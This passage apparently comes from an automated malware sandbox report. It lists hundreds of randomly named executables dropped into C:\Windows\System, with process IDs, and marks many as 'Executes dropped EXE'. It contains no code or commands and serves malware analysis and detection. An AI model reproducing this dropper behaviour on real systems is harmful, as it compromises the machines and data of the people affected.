  - Executes dropped EXE
  PID:5000
- C:\Windows\System\oyXpyRc.exe
  C:\Windows\System\oyXpyRc.exe
  2⤵
  - Executes dropped EXE
  PID:1760
- C:\Windows\System\YBZYhto.exe
  C:\Windows\System\YBZYhto.exe
  2⤵
  - Executes dropped EXE
  PID:3224
- C:\Windows\System\wPDROTt.exe
  C:\Windows\System\wPDROTt.exe
  2⤵
  - Executes dropped EXE
  PID:2924
- C:\Windows\System\ghpEmNU.exe
  C:\Windows\System\ghpEmNU.exe
  2⤵
  - Executes dropped EXE
  PID:3956
- C:\Windows\System\qMfifUK.exe
  C:\Windows\System\qMfifUK.exe
  2⤵
  - Executes dropped EXE
  PID:4852
- C:\Windows\System\FUnRrgG.exe
  C:\Windows\System\FUnRrgG.exe
  2⤵
  - Executes dropped EXE
  PID:4000
- C:\Windows\System\HupkYoB.exe
  C:\Windows\System\HupkYoB.exe
  2⤵
  - Executes dropped EXE
  PID:1060
- C:\Windows\System\RcMFWsw.exe
  C:\Windows\System\RcMFWsw.exe
  2⤵
  - Executes dropped EXE
  PID:3984
- C:\Windows\System\LeyhJAX.exe
  C:\Windows\System\LeyhJAX.exe
  2⤵
  - Executes dropped EXE
  PID:888
- C:\Windows\System\ezjbeGa.exe
  C:\Windows\System\ezjbeGa.exe
  2⤵
  - Executes dropped EXE
  PID:3200
- C:\Windows\System\XFCiZXn.exe
  C:\Windows\System\XFCiZXn.exe
  2⤵
  - Executes dropped EXE
  PID:1964
- C:\Windows\System\puHVTYr.exe
  C:\Windows\System\puHVTYr.exe
  2⤵
  - Executes dropped EXE
  PID:2692
- C:\Windows\System\FeVlXiG.exe
  C:\Windows\System\FeVlXiG.exe
  2⤵
  - Executes dropped EXE
  PID:4580
- C:\Windows\System\dKFQFsM.exe
  C:\Windows\System\dKFQFsM.exe
  2⤵
  - Executes dropped EXE
  PID:1872
- C:\Windows\System\IoJYpyq.exe
  C:\Windows\System\IoJYpyq.exe
  2⤵
  - Executes dropped EXE
  PID:3668
- C:\Windows\System\IwaEaON.exe
  C:\Windows\System\IwaEaON.exe
  2⤵
  - Executes dropped EXE
  PID:2644
- C:\Windows\System\WuqdLTO.exe
  C:\Windows\System\WuqdLTO.exe
  2⤵
  - Executes dropped EXE
  PID:4448
- C:\Windows\System\AhRHCBo.exe
  C:\Windows\System\AhRHCBo.exe
  2⤵
  - Executes dropped EXE
  PID:4464
- C:\Windows\System\GLTBeiu.exe
  C:\Windows\System\GLTBeiu.exe
  2⤵
  - Executes dropped EXE
  PID:3348
- C:\Windows\System\gvuhPne.exe
  C:\Windows\System\gvuhPne.exe
  2⤵
  - Executes dropped EXE
  PID:2700
- C:\Windows\System\rKSyRJa.exe
  C:\Windows\System\rKSyRJa.exe
  2⤵
  - Executes dropped EXE
  PID:2588
- C:\Windows\System\AbMrFhZ.exe
  C:\Windows\System\AbMrFhZ.exe
  2⤵
  - Executes dropped EXE
  PID:5084
- C:\Windows\System\zbguIMB.exe
  C:\Windows\System\zbguIMB.exe
  2⤵
  - Executes dropped EXE
  PID:4180
- C:\Windows\System\UTgzdhg.exe
  C:\Windows\System\UTgzdhg.exe
  2⤵
  - Executes dropped EXE
  PID:4272
- C:\Windows\System\BFKisak.exe
  C:\Windows\System\BFKisak.exe
  2⤵
  - Executes dropped EXE
  PID:4920
- C:\Windows\System\typcjkw.exe
  C:\Windows\System\typcjkw.exe
  2⤵
  - Executes dropped EXE
  PID:1168
- C:\Windows\System\GpUMBpp.exe
  C:\Windows\System\GpUMBpp.exe
  2⤵
  - Executes dropped EXE
  PID:1504
- C:\Windows\System\XvNPDTB.exe
  C:\Windows\System\XvNPDTB.exe
  2⤵
  - Executes dropped EXE
  PID:1148
- C:\Windows\System\MbDTtAa.exe
  C:\Windows\System\MbDTtAa.exe
  2⤵
  - Executes dropped EXE
  PID:2268
- C:\Windows\System\XbsCQMi.exe
  C:\Windows\System\XbsCQMi.exe
  2⤵
  - Executes dropped EXE
  PID:1472
- C:\Windows\System\gNeaJxt.exe
  C:\Windows\System\gNeaJxt.exe
  2⤵
  - Executes dropped EXE
  PID:4092
- C:\Windows\System\TNDPjkp.exe
  C:\Windows\System\TNDPjkp.exe
  2⤵
  - Executes dropped EXE
  PID:4516
- C:\Windows\System\MXTTynt.exe
  C:\Windows\System\MXTTynt.exe
  2⤵
  - Executes dropped EXE
  PID:5088
- C:\Windows\System\xkvTRJQ.exe
  C:\Windows\System\xkvTRJQ.exe
  2⤵
  - Executes dropped EXE
  PID:3044
- C:\Windows\System\pJUNoTI.exe
  C:\Windows\System\pJUNoTI.exe
  2⤵
  - Executes dropped EXE
  PID:3244
- C:\Windows\System\cMYilMO.exe
  C:\Windows\System\cMYilMO.exe
  2⤵
  - Executes dropped EXE
  PID:3464
- C:\Windows\System\JksMoZq.exe
  C:\Windows\System\JksMoZq.exe
  2⤵
  - Executes dropped EXE
  PID:4264
- C:\Windows\System\CDxlleW.exe
  C:\Windows\System\CDxlleW.exe
  2⤵
  - Executes dropped EXE
  PID:3156
- C:\Windows\System\vcIEKuv.exe
  C:\Windows\System\vcIEKuv.exe
  2⤵
  - Executes dropped EXE
  PID:1808
- C:\Windows\System\AhiACpz.exe
  C:\Windows\System\AhiACpz.exe
  2⤵
  - Executes dropped EXE
  PID:3788
- C:\Windows\System\nzljVbW.exe
  C:\Windows\System\nzljVbW.exe
  2⤵
  - Executes dropped EXE
  PID:2292
- C:\Windows\System\ajmaLDT.exe
  C:\Windows\System\ajmaLDT.exe
  2⤵
  - Executes dropped EXE
  PID:4504
- C:\Windows\System\yeTPdUA.exe
  C:\Windows\System\yeTPdUA.exe
  2⤵
  - Executes dropped EXE
  PID:1624
- C:\Windows\System\FWnsnbG.exe
  C:\Windows\System\FWnsnbG.exe
  2⤵
  - Executes dropped EXE
  PID:2524
- C:\Windows\System\oOjIqWq.exe
  C:\Windows\System\oOjIqWq.exe
  2⤵
  - Executes dropped EXE
  PID:4532
- C:\Windows\System\ZHWJyaR.exe
  C:\Windows\System\ZHWJyaR.exe
  2⤵
  - Executes dropped EXE
  PID:1952
- C:\Windows\System\mMvTUzP.exe
  C:\Windows\System\mMvTUzP.exe
  2⤵
  - Executes dropped EXE
  PID:2768
- C:\Windows\System\OviuWPT.exe
  C:\Windows\System\OviuWPT.exe
  2⤵
  - Executes dropped EXE
  PID:2780
- C:\Windows\System\uQNmsXZ.exe
  C:\Windows\System\uQNmsXZ.exe
  2⤵
  - Executes dropped EXE
  PID:4392
- C:\Windows\System\iQwZUdN.exe
  C:\Windows\System\iQwZUdN.exe
  2⤵
  - Executes dropped EXE
  PID:3524
- C:\Windows\System\ZcoquNB.exe
  C:\Windows\System\ZcoquNB.exe
  2⤵
  PID:4756
- C:\Windows\System\shziLlF.exe
  C:\Windows\System\shziLlF.exe
  2⤵
  PID:3712
- C:\Windows\System\bEBatFD.exe
  C:\Windows\System\bEBatFD.exe
  2⤵
  PID:4956
- C:\Windows\System\elRaxtj.exe
  C:\Windows\System\elRaxtj.exe
  2⤵
  PID:5032
- C:\Windows\System\BNbqfyK.exe
  C:\Windows\System\BNbqfyK.exe
  2⤵
  PID:3900
- C:\Windows\System\kueKwpy.exe
  C:\Windows\System\kueKwpy.exe
  2⤵
  PID:3932
- C:\Windows\System\FFJYlWc.exe
  C:\Windows\System\FFJYlWc.exe
  2⤵
  PID:4536
- C:\Windows\System\KXNLqGm.exe
  C:\Windows\System\KXNLqGm.exe
  2⤵
  PID:4760
- C:\Windows\System\hZfyrlw.exe
  C:\Windows\System\hZfyrlw.exe
  2⤵
  PID:3272
- C:\Windows\System\raXlmzM.exe
  C:\Windows\System\raXlmzM.exe
  2⤵
  PID:4824
- C:\Windows\System\dspLFeS.exe
  C:\Windows\System\dspLFeS.exe
  2⤵
  PID:728
- C:\Windows\System\CdOLtra.exe
  C:\Windows\System\CdOLtra.exe
  2⤵
  PID:2356
- C:\Windows\System\stTAQqV.exe
  C:\Windows\System\stTAQqV.exe
  2⤵
  PID:1212
- C:\Windows\System\LubFuna.exe
  C:\Windows\System\LubFuna.exe
  2⤵
  PID:5176
- C:\Windows\System\oubaUTV.exe
  C:\Windows\System\oubaUTV.exe
  2⤵
  PID:5204
- C:\Windows\System\hlHARDp.exe
  C:\Windows\System\hlHARDp.exe
  2⤵
  PID:5244
- C:\Windows\System\qOajJGr.exe
  C:\Windows\System\qOajJGr.exe
  2⤵
  PID:5284
- C:\Windows\System\oBBrGDU.exe
  C:\Windows\System\oBBrGDU.exe
  2⤵
  PID:5320
- C:\Windows\System\SUMVyND.exe
  C:\Windows\System\SUMVyND.exe
  2⤵
  PID:5352
- C:\Windows\System\rljjdQm.exe
  C:\Windows\System\rljjdQm.exe
  2⤵
  PID:5372
- C:\Windows\System\xjKhxeX.exe
  C:\Windows\System\xjKhxeX.exe
  2⤵
  PID:5400
- C:\Windows\System\TMCwcFw.exe
  C:\Windows\System\TMCwcFw.exe
  2⤵
  PID:5432
- C:\Windows\System\WZJpbZP.exe
  C:\Windows\System\WZJpbZP.exe
  2⤵
  PID:5472
- C:\Windows\System\ucXdrtw.exe
  C:\Windows\System\ucXdrtw.exe
  2⤵
  PID:5520
- C:\Windows\System\ODqutVx.exe
  C:\Windows\System\ODqutVx.exe
  2⤵
  PID:5556
- C:\Windows\System\cFkNWwP.exe
  C:\Windows\System\cFkNWwP.exe
  2⤵
  PID:5592
- C:\Windows\System\ogQAixH.exe
  C:\Windows\System\ogQAixH.exe
  2⤵
  PID:5632
- C:\Windows\System\FJnveaJ.exe
  C:\Windows\System\FJnveaJ.exe
  2⤵
  PID:5672
- C:\Windows\System\qYNtkcZ.exe
  C:\Windows\System\qYNtkcZ.exe
  2⤵
  PID:5704
- C:\Windows\System\daMcKdA.exe
  C:\Windows\System\daMcKdA.exe
  2⤵
  PID:5744
- C:\Windows\System\dLXbGPu.exe
  C:\Windows\System\dLXbGPu.exe
  2⤵
  PID:5776
- C:\Windows\System\tPAXFBZ.exe
  C:\Windows\System\tPAXFBZ.exe
  2⤵
  PID:5800
- C:\Windows\System\ahzqoZZ.exe
  C:\Windows\System\ahzqoZZ.exe
  2⤵
  PID:5820
- C:\Windows\System\lPesGEM.exe
  C:\Windows\System\lPesGEM.exe
  2⤵
  PID:5848
- C:\Windows\System\cYZOgxD.exe
  C:\Windows\System\cYZOgxD.exe
  2⤵
  PID:5888
- C:\Windows\System\yWgtJnW.exe
  C:\Windows\System\yWgtJnW.exe
  2⤵
  PID:5920
- C:\Windows\System\UDGVDJh.exe
  C:\Windows\System\UDGVDJh.exe
  2⤵
  PID:5964
- C:\Windows\System\veIEMCZ.exe
  C:\Windows\System\veIEMCZ.exe
  2⤵
  PID:5988
- C:\Windows\System\CNVdntV.exe
  C:\Windows\System\CNVdntV.exe
  2⤵
  PID:6008
- C:\Windows\System\tPxtPYt.exe
  C:\Windows\System\tPxtPYt.exe
  2⤵
  PID:6028
- C:\Windows\System\DvOEaQp.exe
  C:\Windows\System\DvOEaQp.exe
  2⤵
  PID:6072
- C:\Windows\System\yCHXBxY.exe
  C:\Windows\System\yCHXBxY.exe
  2⤵
  PID:6092
- C:\Windows\System\bmTaABw.exe
  C:\Windows\System\bmTaABw.exe
  2⤵
  PID:6124
- C:\Windows\System\yjFFvvQ.exe
  C:\Windows\System\yjFFvvQ.exe
  2⤵
  PID:5164
- C:\Windows\System\eVWPejs.exe
  C:\Windows\System\eVWPejs.exe
  2⤵
  PID:5256
- C:\Windows\System\KkTDDYh.exe
  C:\Windows\System\KkTDDYh.exe
  2⤵
  PID:5296
- C:\Windows\System\godPlHx.exe
  C:\Windows\System\godPlHx.exe
  2⤵
  PID:4752
- C:\Windows\System\uYxxaUe.exe
  C:\Windows\System\uYxxaUe.exe
  2⤵
  PID:5364
- C:\Windows\System\MVBKJAd.exe
  C:\Windows\System\MVBKJAd.exe
  2⤵
  PID:5420
- C:\Windows\System\LJLvkIh.exe
  C:\Windows\System\LJLvkIh.exe
  2⤵
  PID:5552
- C:\Windows\System\eCYgOVW.exe
  C:\Windows\System\eCYgOVW.exe
  2⤵
  PID:5588
- C:\Windows\System\OBWCogE.exe
  C:\Windows\System\OBWCogE.exe
  2⤵
  PID:5664
- C:\Windows\System\dQznVxT.exe
  C:\Windows\System\dQznVxT.exe
  2⤵
  PID:5732
- C:\Windows\System\eeKKWYZ.exe
  C:\Windows\System\eeKKWYZ.exe
  2⤵
  PID:5808
- C:\Windows\System\AwFgHVC.exe
  C:\Windows\System\AwFgHVC.exe
  2⤵
  PID:5916
- C:\Windows\System\YmNoXlV.exe
  C:\Windows\System\YmNoXlV.exe
  2⤵
  PID:5972
- C:\Windows\System\IHioCyH.exe
  C:\Windows\System\IHioCyH.exe
  2⤵
  PID:6088
- C:\Windows\System\rEUOrwu.exe
  C:\Windows\System\rEUOrwu.exe
  2⤵
  PID:6112
- C:\Windows\System\HvjxXnd.exe
  C:\Windows\System\HvjxXnd.exe
  2⤵
  PID:5156
- C:\Windows\System\pUbqfUz.exe
  C:\Windows\System\pUbqfUz.exe
  2⤵
  PID:5276
- C:\Windows\System\ueeiSwm.exe
  C:\Windows\System\ueeiSwm.exe
  2⤵
  PID:4572
- C:\Windows\System\uEMwiuW.exe
  C:\Windows\System\uEMwiuW.exe
  2⤵
  PID:5412
- C:\Windows\System\iKvPmlL.exe
  C:\Windows\System\iKvPmlL.exe
  2⤵
  PID:5644
- C:\Windows\System\ANsHdJn.exe
  C:\Windows\System\ANsHdJn.exe
  2⤵
  PID:5604
- C:\Windows\System\iHSiLmy.exe
  C:\Windows\System\iHSiLmy.exe
  2⤵
  PID:1276
- C:\Windows\System\rizWlBD.exe
  C:\Windows\System\rizWlBD.exe
  2⤵
  PID:5944
- C:\Windows\System\jcrnrHk.exe
  C:\Windows\System\jcrnrHk.exe
  2⤵
  PID:5052
- C:\Windows\System\tMCgeJP.exe
  C:\Windows\System\tMCgeJP.exe
  2⤵
  PID:5332
- C:\Windows\System\yVADHpX.exe
  C:\Windows\System\yVADHpX.exe
  2⤵
  PID:5512
- C:\Windows\System\ErMDpUN.exe
  C:\Windows\System\ErMDpUN.exe
  2⤵
  PID:4564
- C:\Windows\System\dPXdMEG.exe
  C:\Windows\System\dPXdMEG.exe
  2⤵
  PID:6064
- C:\Windows\System\gysRFte.exe
  C:\Windows\System\gysRFte.exe
  2⤵
  PID:228
- C:\Windows\System\tSpTgcg.exe
  C:\Windows\System\tSpTgcg.exe
  2⤵
  PID:2032
- C:\Windows\System\LRtrFNJ.exe
  C:\Windows\System\LRtrFNJ.exe
  2⤵
  PID:6176
- C:\Windows\System\FHOBBcI.exe
  C:\Windows\System\FHOBBcI.exe
  2⤵
  PID:6212
- C:\Windows\System\AsuPQSt.exe
  C:\Windows\System\AsuPQSt.exe
  2⤵
  PID:6248
- C:\Windows\System\BPSeYSK.exe
  C:\Windows\System\BPSeYSK.exe
  2⤵
  PID:6276
- C:\Windows\System\uvDiLzP.exe
  C:\Windows\System\uvDiLzP.exe
  2⤵
  PID:6320
- C:\Windows\System\ZYfqZdg.exe
  C:\Windows\System\ZYfqZdg.exe
  2⤵
  PID:6340
- C:\Windows\System\BxSwPfR.exe
  C:\Windows\System\BxSwPfR.exe
  2⤵
  PID:6380
- C:\Windows\System\vLATzVn.exe
  C:\Windows\System\vLATzVn.exe
  2⤵
  PID:6408
- C:\Windows\System\JkrgYZk.exe
  C:\Windows\System\JkrgYZk.exe
  2⤵
  PID:6444
- C:\Windows\System\SrTBroX.exe
  C:\Windows\System\SrTBroX.exe
  2⤵
  PID:6460
- C:\Windows\System\AsmnPrm.exe
  C:\Windows\System\AsmnPrm.exe
  2⤵
  PID:6484
- C:\Windows\System\rcFKhyM.exe
  C:\Windows\System\rcFKhyM.exe
  2⤵
  PID:6536
- C:\Windows\System\fGPerGC.exe
  C:\Windows\System\fGPerGC.exe
  2⤵
  PID:6568
- C:\Windows\System\npELlyY.exe
  C:\Windows\System\npELlyY.exe
  2⤵
  PID:6600
- C:\Windows\System\ftcsqud.exe
  C:\Windows\System\ftcsqud.exe
  2⤵
  PID:6628
- C:\Windows\System\jKcNCDh.exe
  C:\Windows\System\jKcNCDh.exe
  2⤵
  PID:6656
- C:\Windows\System\WHxajBp.exe
  C:\Windows\System\WHxajBp.exe
  2⤵
  PID:6692
- C:\Windows\System\bpMjATs.exe
  C:\Windows\System\bpMjATs.exe
  2⤵
  PID:6724
- C:\Windows\System\oCUKTQH.exe
  C:\Windows\System\oCUKTQH.exe
  2⤵
  PID:6756
- C:\Windows\System\pDKsdbk.exe
  C:\Windows\System\pDKsdbk.exe
  2⤵
  PID:6784
- C:\Windows\System\cVBuJnR.exe
  C:\Windows\System\cVBuJnR.exe
  2⤵
  PID:6816
- C:\Windows\System\iiGPSDe.exe
  C:\Windows\System\iiGPSDe.exe
  2⤵
  PID:6848
- C:\Windows\System\nEIvHmI.exe
  C:\Windows\System\nEIvHmI.exe
  2⤵
  PID:6876
- C:\Windows\System\sGrVvcQ.exe
  C:\Windows\System\sGrVvcQ.exe
  2⤵
  PID:6904
- C:\Windows\System\mCQUrrC.exe
  C:\Windows\System\mCQUrrC.exe
  2⤵
  PID:6932
- C:\Windows\System\SZunWWM.exe
  C:\Windows\System\SZunWWM.exe
  2⤵
  PID:6964
- C:\Windows\System\vqHOBIB.exe
  C:\Windows\System\vqHOBIB.exe
  2⤵
  PID:7004
- C:\Windows\System\pWkFpYs.exe
  C:\Windows\System\pWkFpYs.exe
  2⤵
  PID:7032
- C:\Windows\System\ssPVXDu.exe
  C:\Windows\System\ssPVXDu.exe
  2⤵
  PID:7068
- C:\Windows\System\uCCbqTD.exe
  C:\Windows\System\uCCbqTD.exe
  2⤵
  PID:7108
- C:\Windows\System\qcmnMpV.exe
  C:\Windows\System\qcmnMpV.exe
  2⤵
  PID:7136
- C:\Windows\System\HmwOEWN.exe
  C:\Windows\System\HmwOEWN.exe
  2⤵
  PID:7160
- C:\Windows\System\GJaEWsC.exe
  C:\Windows\System\GJaEWsC.exe
  2⤵
  PID:6196
- C:\Windows\System\rEgCtUE.exe
  C:\Windows\System\rEgCtUE.exe
  2⤵
  PID:6264
- C:\Windows\System\oUZjNKb.exe
  C:\Windows\System\oUZjNKb.exe
  2⤵
  PID:6292
- C:\Windows\System\AxENqzp.exe
  C:\Windows\System\AxENqzp.exe
  2⤵
  PID:6428
- C:\Windows\System\IQTVQrr.exe
  C:\Windows\System\IQTVQrr.exe
  2⤵
  PID:6512
- C:\Windows\System\XmaGlji.exe
  C:\Windows\System\XmaGlji.exe
  2⤵
  PID:6560
- C:\Windows\System\WQhYtJc.exe
  C:\Windows\System\WQhYtJc.exe
  2⤵
  PID:6612
- C:\Windows\System\ObUCZlz.exe
  C:\Windows\System\ObUCZlz.exe
  2⤵
  PID:6704
- C:\Windows\System\yeHLFWo.exe
  C:\Windows\System\yeHLFWo.exe
  2⤵
  PID:6768
- C:\Windows\System\UjBAirO.exe
  C:\Windows\System\UjBAirO.exe
  2⤵
  PID:6832
- C:\Windows\System\ntTmQZr.exe
  C:\Windows\System\ntTmQZr.exe
  2⤵
  PID:6900
- C:\Windows\System\DNanhJx.exe
  C:\Windows\System\DNanhJx.exe
  2⤵
  PID:6956
- C:\Windows\System\jVtLTbB.exe
  C:\Windows\System\jVtLTbB.exe
  2⤵
  PID:7028
- C:\Windows\System\IELTZiU.exe
  C:\Windows\System\IELTZiU.exe
  2⤵
  PID:7100
- C:\Windows\System\KJsDZBJ.exe
  C:\Windows\System\KJsDZBJ.exe
  2⤵
  PID:6152
- C:\Windows\System\olsUOMj.exe
  C:\Windows\System\olsUOMj.exe
  2⤵
  PID:5908
- C:\Windows\System\qWfZufO.exe
  C:\Windows\System\qWfZufO.exe
  2⤵
  PID:6680
- C:\Windows\System\Wdjjxhv.exe
  C:\Windows\System\Wdjjxhv.exe
  2⤵
  PID:6752
- C:\Windows\System\DgYuVGR.exe
  C:\Windows\System\DgYuVGR.exe
  2⤵
  PID:6796
- C:\Windows\System\OkGMSyE.exe
  C:\Windows\System\OkGMSyE.exe
  2⤵
  PID:6948
- C:\Windows\System\ESUrdUD.exe
  C:\Windows\System\ESUrdUD.exe
  2⤵
  PID:7092
- C:\Windows\System\BKczvnL.exe
  C:\Windows\System\BKczvnL.exe
  2⤵
  PID:6452
- C:\Windows\System\hiVuPTw.exe
  C:\Windows\System\hiVuPTw.exe
  2⤵
  PID:6884
- C:\Windows\System\ZcvoLbM.exe
  C:\Windows\System\ZcvoLbM.exe
  2⤵
  PID:1736
- C:\Windows\System\ubLasLV.exe
  C:\Windows\System\ubLasLV.exe
  2⤵
  PID:6368
- C:\Windows\System\zvqwEbo.exe
  C:\Windows\System\zvqwEbo.exe
  2⤵
  PID:7188
- C:\Windows\System\nJeMlgc.exe
  C:\Windows\System\nJeMlgc.exe
  2⤵
  PID:7224
- C:\Windows\System\zEHFttf.exe
  C:\Windows\System\zEHFttf.exe
  2⤵
  PID:7264
- C:\Windows\System\XpoOiOZ.exe
  C:\Windows\System\XpoOiOZ.exe
  2⤵
  PID:7308
- C:\Windows\System\IfAonOo.exe
  C:\Windows\System\IfAonOo.exe
  2⤵
  PID:7368
- C:\Windows\System\adAsthB.exe
  C:\Windows\System\adAsthB.exe
  2⤵
  PID:7400
- C:\Windows\System\kYiulCJ.exe
  C:\Windows\System\kYiulCJ.exe
  2⤵
  PID:7420
- C:\Windows\System\zXhbLVh.exe
  C:\Windows\System\zXhbLVh.exe
  2⤵
  PID:7448
- C:\Windows\System\NpfLEoe.exe
  C:\Windows\System\NpfLEoe.exe
  2⤵
  PID:7476
- C:\Windows\System\FEVyaZt.exe
  C:\Windows\System\FEVyaZt.exe
  2⤵
  PID:7516
- C:\Windows\System\xwSsbZM.exe
  C:\Windows\System\xwSsbZM.exe
  2⤵
  PID:7544
- C:\Windows\System\HKrNYCF.exe
  C:\Windows\System\HKrNYCF.exe
  2⤵
  PID:7576
- C:\Windows\System\xLucbHr.exe
  C:\Windows\System\xLucbHr.exe
  2⤵
  PID:7592
- C:\Windows\System\uFWVvhU.exe
  C:\Windows\System\uFWVvhU.exe
  2⤵
  PID:7636
- C:\Windows\System\aJZLqgr.exe
  C:\Windows\System\aJZLqgr.exe
  2⤵
  PID:7684
- C:\Windows\System\CvmJoeC.exe
  C:\Windows\System\CvmJoeC.exe
  2⤵
  PID:7716
- C:\Windows\System\RGudfFe.exe
  C:\Windows\System\RGudfFe.exe
  2⤵
  PID:7740
- C:\Windows\System\zkojBTg.exe
  C:\Windows\System\zkojBTg.exe
  2⤵
  PID:7760
- C:\Windows\System\pcNRSPw.exe
  C:\Windows\System\pcNRSPw.exe
  2⤵
  PID:7792
- C:\Windows\System\lGMyiCI.exe
  C:\Windows\System\lGMyiCI.exe
  2⤵
  PID:7820
- C:\Windows\System\JsKozTa.exe
  C:\Windows\System\JsKozTa.exe
  2⤵
  PID:7852
- C:\Windows\System\bWefPFR.exe
  C:\Windows\System\bWefPFR.exe
  2⤵
  PID:7876
- C:\Windows\System\WzSaGEF.exe
  C:\Windows\System\WzSaGEF.exe
  2⤵
  PID:7904
- C:\Windows\System\xMUHTFm.exe
  C:\Windows\System\xMUHTFm.exe
  2⤵
  PID:7932
- C:\Windows\System\OOsAoOg.exe
  C:\Windows\System\OOsAoOg.exe
  2⤵
  PID:7960
- C:\Windows\System\dQAGIdS.exe
  C:\Windows\System\dQAGIdS.exe
  2⤵
  PID:7988
- C:\Windows\System\vPBjEIe.exe
  C:\Windows\System\vPBjEIe.exe
  2⤵
  PID:8024
- C:\Windows\System\yuNzlFm.exe
  C:\Windows\System\yuNzlFm.exe
  2⤵
  PID:8048
- C:\Windows\System\RrJSWjA.exe
  C:\Windows\System\RrJSWjA.exe
  2⤵
  PID:8072
- C:\Windows\System\gRRtGpH.exe
  C:\Windows\System\gRRtGpH.exe
  2⤵
  PID:8100
- C:\Windows\System\sACzhvN.exe
  C:\Windows\System\sACzhvN.exe
  2⤵
  PID:8128
- C:\Windows\System\fNTMGwL.exe
  C:\Windows\System\fNTMGwL.exe
  2⤵
  PID:8156
- C:\Windows\System\smYhWVY.exe
  C:\Windows\System\smYhWVY.exe
  2⤵
  PID:8188
- C:\Windows\System\pcZGBpx.exe
  C:\Windows\System\pcZGBpx.exe
  2⤵
  PID:7232
- C:\Windows\System\utrpQBm.exe
  C:\Windows\System\utrpQBm.exe
  2⤵
  PID:7356
- C:\Windows\System\IDFjSvF.exe
  C:\Windows\System\IDFjSvF.exe
  2⤵
  PID:7416
- C:\Windows\System\bMrkYZq.exe
  C:\Windows\System\bMrkYZq.exe
  2⤵
  PID:7512
- C:\Windows\System\CkkGMAD.exe
  C:\Windows\System\CkkGMAD.exe
  2⤵
  PID:7568
- C:\Windows\System\cgADtVT.exe
  C:\Windows\System\cgADtVT.exe
  2⤵
  PID:7652
- C:\Windows\System\hruqhxw.exe
  C:\Windows\System\hruqhxw.exe
  2⤵
  PID:7700
- C:\Windows\System\cmeLhIH.exe
  C:\Windows\System\cmeLhIH.exe
  2⤵
  PID:7780
- C:\Windows\System\nvYsfgT.exe
  C:\Windows\System\nvYsfgT.exe
  2⤵
  PID:7844
- C:\Windows\System\nonzQgi.exe
  C:\Windows\System\nonzQgi.exe
  2⤵
  PID:7928
- C:\Windows\System\gJKudmJ.exe
  C:\Windows\System\gJKudmJ.exe
  2⤵
  PID:7980
- C:\Windows\System\MqqYwmQ.exe
  C:\Windows\System\MqqYwmQ.exe
  2⤵
  PID:8064
- C:\Windows\System\XUtcaTk.exe
  C:\Windows\System\XUtcaTk.exe
  2⤵
  PID:8112
- C:\Windows\System\eebFGty.exe
  C:\Windows\System\eebFGty.exe
  2⤵
  PID:7176
- C:\Windows\System\xHkxNNG.exe
  C:\Windows\System\xHkxNNG.exe
  2⤵
  PID:7388
- C:\Windows\System\KEDBBOE.exe
  C:\Windows\System\KEDBBOE.exe
  2⤵
  PID:7536
- C:\Windows\System\oCDdhbz.exe
  C:\Windows\System\oCDdhbz.exe
  2⤵
  PID:7728
- C:\Windows\System\BpjgMPL.exe
  C:\Windows\System\BpjgMPL.exe
  2⤵
  PID:7888
- C:\Windows\System\ixzHBNG.exe
  C:\Windows\System\ixzHBNG.exe
  2⤵
  PID:8084
- C:\Windows\System\yVwCCib.exe
  C:\Windows\System\yVwCCib.exe
  2⤵
  PID:8176
- C:\Windows\System\dvlHRyh.exe
  C:\Windows\System\dvlHRyh.exe
  2⤵
  PID:7672
- C:\Windows\System\udKnSdk.exe
  C:\Windows\System\udKnSdk.exe
  2⤵
  PID:7972
- C:\Windows\System\YvaVSPN.exe
  C:\Windows\System\YvaVSPN.exe
  2⤵
  PID:8168
- C:\Windows\System\dWoJuVI.exe
  C:\Windows\System\dWoJuVI.exe
  2⤵
  PID:7504
- C:\Windows\System\vxUAObt.exe
  C:\Windows\System\vxUAObt.exe
  2⤵
  PID:8212
- C:\Windows\System\DFvAAuy.exe
  C:\Windows\System\DFvAAuy.exe
  2⤵
  PID:8240
- C:\Windows\System\hSAChat.exe
  C:\Windows\System\hSAChat.exe
  2⤵
  PID:8268
- C:\Windows\System\pkctlUT.exe
  C:\Windows\System\pkctlUT.exe
  2⤵
  PID:8296
- C:\Windows\System\bDXiYnx.exe
  C:\Windows\System\bDXiYnx.exe
  2⤵
  PID:8324
- C:\Windows\System\ejcuErj.exe
  C:\Windows\System\ejcuErj.exe
  2⤵
  PID:8352
- C:\Windows\System\JnVuanl.exe
  C:\Windows\System\JnVuanl.exe
  2⤵
  PID:8380
- C:\Windows\System\HGKGfFX.exe
  C:\Windows\System\HGKGfFX.exe
  2⤵
  PID:8408
- C:\Windows\System\WcWQPnj.exe
  C:\Windows\System\WcWQPnj.exe
  2⤵
  PID:8436
- C:\Windows\System\sDjEhWz.exe
  C:\Windows\System\sDjEhWz.exe
  2⤵
  PID:8464
- C:\Windows\System\bxcMPAC.exe
  C:\Windows\System\bxcMPAC.exe
  2⤵
  PID:8492
- C:\Windows\System\IhAiGjo.exe
  C:\Windows\System\IhAiGjo.exe
  2⤵
  PID:8520
- C:\Windows\System\VTpzwqE.exe
  C:\Windows\System\VTpzwqE.exe
  2⤵
  PID:8548
- C:\Windows\System\xhWhrYk.exe
  C:\Windows\System\xhWhrYk.exe
  2⤵
  PID:8576
- C:\Windows\System\SqVqrLb.exe
  C:\Windows\System\SqVqrLb.exe
  2⤵
  PID:8604
- C:\Windows\System\ebexYpT.exe
  C:\Windows\System\ebexYpT.exe
  2⤵
  PID:8632
- C:\Windows\System\sFIIsHy.exe
  C:\Windows\System\sFIIsHy.exe
  2⤵
  PID:8660
- C:\Windows\System\ZtAysts.exe
  C:\Windows\System\ZtAysts.exe
  2⤵
  PID:8688
- C:\Windows\System\OyxQwpk.exe
  C:\Windows\System\OyxQwpk.exe
  2⤵
  PID:8724
- C:\Windows\System\rcLxdIc.exe
  C:\Windows\System\rcLxdIc.exe
  2⤵
  PID:8748
- C:\Windows\System\ydDzlQK.exe
  C:\Windows\System\ydDzlQK.exe
  2⤵
  PID:8772
- C:\Windows\System\HRttZWh.exe
  C:\Windows\System\HRttZWh.exe
  2⤵
  PID:8800
- C:\Windows\System\XNGzbof.exe
  C:\Windows\System\XNGzbof.exe
  2⤵
  PID:8828
- C:\Windows\System\BtWaonE.exe
  C:\Windows\System\BtWaonE.exe
  2⤵
  PID:8856
- C:\Windows\System\kWCMbpK.exe
  C:\Windows\System\kWCMbpK.exe
  2⤵
  PID:8884
- C:\Windows\System\DEfkeWP.exe
  C:\Windows\System\DEfkeWP.exe
  2⤵
  PID:8912
- C:\Windows\System\hHDxqKQ.exe
  C:\Windows\System\hHDxqKQ.exe
  2⤵
  PID:8940
- C:\Windows\System\GfLopQB.exe
